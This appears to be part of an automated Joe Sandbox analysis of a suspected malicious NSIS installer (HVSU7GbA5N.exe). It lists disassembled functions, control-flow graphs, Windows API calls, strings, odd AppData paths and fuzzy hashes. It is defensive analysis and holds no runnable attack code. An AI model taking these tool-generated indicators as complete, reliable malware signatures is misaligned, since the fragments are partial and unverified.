                                                                                                                                            control_flow_graph 719 406197-40619c 720 40620d-40622b 719->720 721 40619e-4061cd 719->721 722 406803-406818 720->722 723 4061d4-4061d8 721->723 724 4061cf-4061d2 721->724 725 406832-406848 722->725 726 40681a-406830 722->726 728 4061e0 723->728 729 4061da-4061de 723->729 727 4061e4-4061e7 724->727 730 40684b-406852 725->730 726->730 731 406205-406208 727->731 732 4061e9-4061f2 727->732 728->727 729->727 734 406854-406858 730->734 735 406879-406885 730->735 733 4063da-4063f8 731->733 736 4061f4 732->736 737 4061f7-406203 732->737 742 406410-406422 733->742 743 4063fa-40640e 733->743 739 406a07-406a11 734->739 740 40685e-406876 734->740 747 40601b-406024 735->747 736->737 738 40626d-40629b 737->738 745 4062b7-4062d1 738->745 746 40629d-4062b5 738->746 744 406a1d-406a30 739->744 740->735 748 406425-40642f 742->748 743->748 749 406a35-406a39 744->749 752 4062d4-4062de 745->752 746->752 750 406a32 747->750 751 40602a 747->751 753 406431 748->753 754 4063d2-4063d8 748->754 750->749 755 406031-406035 751->755 756 406171-406192 751->756 757 4060d6-4060da 751->757 758 406146-40614a 751->758 760 4062e4 752->760 761 406255-40625b 752->761 762 406542-40654f 753->762 763 4063ad-4063b1 753->763 754->733 759 406376-406380 754->759 755->744 773 40603b-406048 755->773 756->722 764 4060e0-4060f9 757->764 765 406986-406990 757->765 774 406150-406164 758->774 775 406995-40699f 758->775 766 4069c5-4069cf 759->766 767 406386-4063a8 759->767 779 4069a1-4069ab 760->779 780 40623a-406252 760->780 768 406261-406267 761->768 769 40630e-406314 761->769 762->747 770 40659e-4065ad 762->770 771 4063b7-4063cf 763->771 772 4069b9-4069c3 763->772 778 4060fc-406100 764->778 765->744 766->744 767->762 768->738 781 406372 768->781 769->781 783 406316-406334 769->783 770->722 771->754 772->744 773->750 777 40604e-406094 773->777 782 406167-40616f 774->782 775->744 787 406096-40609a 777->787 788 4060bc-4060be 777->788 778->757 786 406102-406108 778->786 779->744 780->761 781->759 782->756 782->758 784 406336-40634a 783->784 785 40634c-40635e 783->785 789 406361-40636b 784->789 785->789 794 406132-406144 786->794 795 40610a-406111 786->795 790 4060a5-4060b3 GlobalAlloc 787->790 791 40609c-40609f GlobalFree 787->791 792 4060c0-4060ca 788->792 793 4060cc-4060d4 788->793 789->769 796 40636d 789->796 790->750 799 4060b9 790->799 791->790 792->792 792->793 793->778 794->782 797 406113-406116 GlobalFree 795->797 798 40611c-40612c GlobalAlloc 795->798 801 4062f3-40630b 796->801 802 4069ad-4069b7 796->802 797->798 798->750 798->794 799->788 801->769 802->744
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
                                                                                                                                            • Instruction ID: 01902b0c5badf26c21563370f74918c90dc48b9c290b8d647ce642e1aeaa84f8
                                                                                                                                            • Opcode Fuzzy Hash: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
                                                                                                                                            • Instruction Fuzzy Hash: 99F18671D00229CBDF28CFA8C8946ADBBB0FF45305F25856ED856BB281D7385A96CF44
                                                                                                                                            Function 00405EE8 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405F16
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                            • Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                                                                                            • Instruction ID: dd30d9296bace99b119292820e2dbffb2fd0b4cb1c2bef09bc496f5d2c6c7741
                                                                                                                                            • Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                                                                                            • Instruction Fuzzy Hash: A6E0C232A08511ABC710AB349C08A6B77A8EFC8650304893EF501F6151D738AC11ABAE
                                                                                                                                            Function 00405EC1 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00421528,004210E0,0040577E,004210E0,004210E0,00000000,004210E0,004210E0,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410), ref: 00405ECC
                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00405ED8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                            • Opcode ID: f7c2684b86b1527493efd370d531fce5aff0e856747922587c11eb9b8a6dacaa
                                                                                                                                            • Instruction ID: c8363a8003639f247cd95da1b4b67004b06b28060bca14ca5f7d033ebcfdecfd
                                                                                                                                            • Opcode Fuzzy Hash: f7c2684b86b1527493efd370d531fce5aff0e856747922587c11eb9b8a6dacaa
                                                                                                                                            • Instruction Fuzzy Hash: 9ED012369194206BC7005B78AC0C85B7A98EF593317608A33B5A5F52F0C7788D528AEA
                                                                                                                                            Function 004039A0 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 169 4039a0-4039b2 170 403af3-403b02 169->170 171 4039b8-4039be 169->171 173 403b51-403b66 170->173 174 403b04-403b4c GetDlgItem * 2 call 403e73 SetClassLongA call 40140b 170->174 171->170 172 4039c4-4039cd 171->172 175 4039e2-4039e5 172->175 176 4039cf-4039dc SetWindowPos 172->176 178 403ba6-403bab call 403ebf 173->178 179 403b68-403b6b 173->179 174->173 181 4039e7-4039f9 ShowWindow 175->181 182 4039ff-403a05 175->182 176->175 188 403bb0-403bcb 178->188 184 403b6d-403b78 call 401389 179->184 185 403b9e-403ba0 179->185 181->182 189 403a21-403a24 182->189 190 403a07-403a1c DestroyWindow 182->190 184->185 200 403b7a-403b99 SendMessageA 184->200 185->178 187 403e40 185->187 195 403e42-403e49 187->195 193 403bd4-403bda 188->193 194 403bcd-403bcf call 40140b 188->194 198 403a26-403a32 SetWindowLongA 189->198 199 403a37-403a3d 189->199 196 403e1d-403e23 190->196 203 403be0-403beb 193->203 204 403dfe-403e17 DestroyWindow EndDialog 193->204 194->193 196->187 201 403e25-403e2b 196->201 198->195 205 403ae0-403aee call 403eda 199->205 206 403a43-403a54 GetDlgItem 199->206 200->195 201->187 210 403e2d-403e36 ShowWindow 201->210 203->204 211 403bf1-403c3e call 405bdf call 403e73 * 3 GetDlgItem 203->211 204->196 205->195 207 403a73-403a76 206->207 208 403a56-403a6d SendMessageA IsWindowEnabled 206->208 212 403a78-403a79 207->212 213 403a7b-403a7e 207->213 208->187 208->207 210->187 239 403c40-403c45 211->239 240 403c48-403c84 ShowWindow KiUserCallbackDispatcher call 403e95 EnableWindow 211->240 216 403aa9-403aae call 403e4c 212->216 217 403a80-403a86 213->217 218 403a8c-403a91 213->218 216->205 220 403ac7-403ada SendMessageA 217->220 221 403a88-403a8a 217->221 218->220 222 403a93-403a99 218->222 220->205 221->216 225 403ab0-403ab9 call 40140b 222->225 226 403a9b-403aa1 call 40140b 222->226 225->205 235 403abb-403ac5 225->235 237 403aa7 226->237 235->237 237->216 239->240 243 403c86-403c87 240->243 244 403c89 240->244 245 403c8b-403cb9 GetSystemMenu EnableMenuItem SendMessageA 243->245 244->245 246 403cbb-403ccc SendMessageA 245->246 247 403cce 245->247 248 403cd4-403d0d call 403ea8 call 405bbd lstrlenA call 405bdf SetWindowTextA call 401389 246->248 247->248 248->188 257 403d13-403d15 248->257 257->188 258 403d1b-403d1f 257->258 259 403d21-403d27 258->259 260 403d3e-403d52 DestroyWindow 258->260 259->187 261 403d2d-403d33 259->261 260->196 262 403d58-403d85 CreateDialogParamA 260->262 261->188 263 403d39 261->263 262->196 264 403d8b-403de2 call 403e73 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 262->264 263->187 264->187 269 403de4-403df7 ShowWindow call 403ebf 264->269 271 403dfc 269->271 271->196
                                                                                                                                            APIs
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039DC
                                                                                                                                            • ShowWindow.USER32(?), ref: 004039F9
                                                                                                                                            • DestroyWindow.USER32 ref: 00403A0D
                                                                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A29
                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403A4A
                                                                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A5E
                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403A65
                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403B13
                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403B1D
                                                                                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403B37
                                                                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B88
                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403C2E
                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403C4F
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C61
                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00403C7C
                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C92
                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403C99
                                                                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CB1
                                                                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CC4
                                                                                                                                            • lstrlenA.KERNEL32(Originals Setup: Completed,?,Originals Setup: Completed,Originals Setup), ref: 00403CED
                                                                                                                                            • SetWindowTextA.USER32(?,Originals Setup: Completed), ref: 00403CFC
                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403E30
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                            • String ID: Originals Setup$Originals Setup: Completed
                                                                                                                                            • API String ID: 3282139019-952384604
                                                                                                                                            • Opcode ID: c4d288c9213a4ff13c75ca07aa37345a46e4ee7ce1d3a7d01e6124bc117d097b
                                                                                                                                            • Instruction ID: 6a308cc8f2d4566e8290075db2a5fe9cea5b682110ca7f7f0817dc9b094a1d3c
                                                                                                                                            • Opcode Fuzzy Hash: c4d288c9213a4ff13c75ca07aa37345a46e4ee7ce1d3a7d01e6124bc117d097b
                                                                                                                                            • Instruction Fuzzy Hash: 0EC1D271604204BBDB21AF61ED45E2B3E7DFB44706B40053EF641B12E1C779A942AF6E
                                                                                                                                            Function 0040360E Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 272 40360e-403626 call 405ee8 275 403628-403638 call 405b1b 272->275 276 40363a-40366b call 405aa4 272->276 284 40368e-4036b7 call 4038d3 call 40573b 275->284 281 403683-403689 lstrcatA 276->281 282 40366d-40367e call 405aa4 276->282 281->284 282->281 290 4036bd-4036c2 284->290 291 40373e-403746 call 40573b 284->291 290->291 292 4036c4-4036e8 call 405aa4 290->292 297 403754-403779 LoadImageA 291->297 298 403748-40374f call 405bdf 291->298 292->291 299 4036ea-4036ec 292->299 301 4037fa-403802 call 40140b 297->301 302 40377b-4037ab RegisterClassA 297->302 298->297 306 4036fd-403709 lstrlenA 299->306 307 4036ee-4036fb call 405678 299->307 314 403804-403807 301->314 315 40380c-403817 call 4038d3 301->315 303 4037b1-4037f5 SystemParametersInfoA CreateWindowExA 302->303 304 4038c9 302->304 303->301 311 4038cb-4038d2 304->311 308 403731-403739 call 40564d call 405bbd 306->308 309 40370b-403719 lstrcmpiA 306->309 307->306 308->291 309->308 313 40371b-403725 GetFileAttributesA 309->313 318 403727-403729 313->318 319 40372b-40372c call 405694 313->319 314->311 325 4038a0-4038a1 call 404f78 315->325 326 40381d-40383a ShowWindow LoadLibraryA 315->326 318->308 318->319 319->308 330 4038a6-4038a8 325->330 328 403843-403855 GetClassInfoA 326->328 329 40383c-403841 LoadLibraryA 326->329 331 403857-403867 GetClassInfoA RegisterClassA 328->331 332 40386d-403890 DialogBoxParamA call 40140b 328->332 329->328 333 4038c2-4038c4 call 40140b 330->333 334 4038aa-4038b0 330->334 331->332 338 403895-40389e call 40355e 332->338 333->304 334->314 336 4038b6-4038bd call 40140b 334->336 336->314 338->311
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
                                                                                                                                              • Part of subcall function 00405EE8: LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
                                                                                                                                              • Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16
                                                                                                                                            • lstrcatA.KERNEL32(1033,Originals Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Originals Setup: Completed,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573410,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000000), ref: 00403689
                                                                                                                                            • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,1033,Originals Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Originals Setup: Completed,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 004036FE
                                                                                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403711
                                                                                                                                            • GetFileAttributesA.KERNEL32(: Completed), ref: 0040371C
                                                                                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens), ref: 00403765
                                                                                                                                              • Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28
                                                                                                                                            • RegisterClassA.USER32(00422E80), ref: 004037A2
                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037BA
                                                                                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037EF
                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403825
                                                                                                                                            • LoadLibraryA.KERNELBASE(RichEd20), ref: 00403836
                                                                                                                                            • LoadLibraryA.KERNEL32(RichEd32), ref: 00403841
                                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 00403851
                                                                                                                                            • GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 0040385E
                                                                                                                                            • RegisterClassA.USER32(00422E80), ref: 00403867
                                                                                                                                            • DialogBoxParamA.USER32(?,00000000,004039A0,00000000), ref: 00403886
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Originals Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                            • API String ID: 914957316-2049690784
                                                                                                                                            • Opcode ID: 04695480405891d431fb5b182ebd05ffb522bb116bc315d28555dd4449e2f2fa
                                                                                                                                            • Instruction ID: a1152651de681702ec182a4452d53c4528d9546a1521c59b1686b62f96f1e611
                                                                                                                                            • Opcode Fuzzy Hash: 04695480405891d431fb5b182ebd05ffb522bb116bc315d28555dd4449e2f2fa
                                                                                                                                            • Instruction Fuzzy Hash: 966107B16442007FD7206F659D85F2B3AACEB4474AF40457FF840B62E1C7BD6D029A2E
                                                                                                                                            Function 00402C29 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 343 402c29-402c77 GetTickCount GetModuleFileNameA call 40584e 346 402c83-402cb1 call 405bbd call 405694 call 405bbd GetFileSize 343->346 347 402c79-402c7e 343->347 355 402cb7 346->355 356 402d9e-402dac call 402bc5 346->356 348 402e5b-402e5f 347->348 358 402cbc-402cd3 355->358 362 402e01-402e06 356->362 363 402dae-402db1 356->363 360 402cd5 358->360 361 402cd7-402ce0 call 403055 358->361 360->361 369 402ce6-402ced 361->369 370 402e08-402e10 call 402bc5 361->370 362->348 365 402db3-402dcb call 40306b call 403055 363->365 366 402dd5-402dff GlobalAlloc call 40306b call 402e62 363->366 365->362 389 402dcd-402dd3 365->389 366->362 394 402e12-402e23 366->394 374 402d69-402d6d 369->374 375 402cef-402d03 call 405809 369->375 370->362 379 402d77-402d7d 374->379 380 402d6f-402d76 call 402bc5 374->380 375->379 392 402d05-402d0c 375->392 385 402d8c-402d96 379->385 386 402d7f-402d89 call 405f5a 379->386 380->379 385->358 393 402d9c 385->393 386->385 389->362 389->366 392->379 398 402d0e-402d15 392->398 393->356 395 402e25 394->395 396 402e2b-402e30 394->396 395->396 399 402e31-402e37 396->399 398->379 400 402d17-402d1e 398->400 399->399 402 402e39-402e54 SetFilePointer call 405809 399->402 400->379 401 402d20-402d27 400->401 401->379 403 402d29-402d49 401->403 406 402e59 402->406 403->362 405 402d4f-402d53 403->405 407 402d55-402d59 405->407 408 402d5b-402d63 405->408 406->348 407->393 407->408 408->379 409 402d65-402d67 408->409 409->379
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C3A
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HVSU7GbA5N.exe,00000400), ref: 00402C56
                                                                                                                                              • Part of subcall function 0040584E: GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00405852
                                                                                                                                              • Part of subcall function 0040584E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405874
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HVSU7GbA5N.exe,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00402CA2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                            • String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\HVSU7GbA5N.exe$Error launching installer$F$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$J$Null$soft
                                                                                                                                            • API String ID: 4283519449-3967052016
                                                                                                                                            • Opcode ID: 83888f2de956a22d0bc41c9bd18695b65df7ebb646604f4f840fd8a04a0cb393
                                                                                                                                            • Instruction ID: f25878a385a50b793721b7c2dc62060375717e7a9e735ffe9872fd5df72a7917
                                                                                                                                            • Opcode Fuzzy Hash: 83888f2de956a22d0bc41c9bd18695b65df7ebb646604f4f840fd8a04a0cb393
                                                                                                                                            • Instruction Fuzzy Hash: 7651F671A00215ABDB20AF65DE89F9E7BB8EB04315F10413BF904B62D1D7BC9E418B9D
                                                                                                                                            Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 472 40173f-401762 call 4029fd call 4056ba 477 401764-40176a call 405bbd 472->477 478 40176c-40177e call 405bbd call 40564d lstrcatA 472->478 483 401783-401789 call 405e28 477->483 478->483 488 40178e-401792 483->488 489 401794-40179e call 405ec1 488->489 490 4017c5-4017c8 488->490 498 4017b0-4017c2 489->498 499 4017a0-4017ae CompareFileTime 489->499 492 4017d0-4017ec call 40584e 490->492 493 4017ca-4017cb call 405829 490->493 500 401864-40188d call 404ea6 call 402e62 492->500 501 4017ee-4017f1 492->501 493->492 498->490 499->498 515 401895-4018a1 SetFileTime 500->515 516 40188f-401893 500->516 502 4017f3-401835 call 405bbd * 2 call 405bdf call 405bbd call 4053d1 501->502 503 401846-401850 call 404ea6 501->503 502->488 535 40183b-40183c 502->535 513 401859-40185f 503->513 517 40289b 513->517 519 4018a7-4018b2 CloseHandle 515->519 516->515 516->519 522 40289d-4028a1 517->522 520 402892-402895 519->520 521 4018b8-4018bb 519->521 520->517 524 4018d0-4018d3 call 405bdf 521->524 525 4018bd-4018ce call 405bdf lstrcatA 521->525 531 4018d8-40222b call 4053d1 524->531 525->531 531->522 535->513 537 40183e-40183f 535->537 537->503
                                                                                                                                            APIs
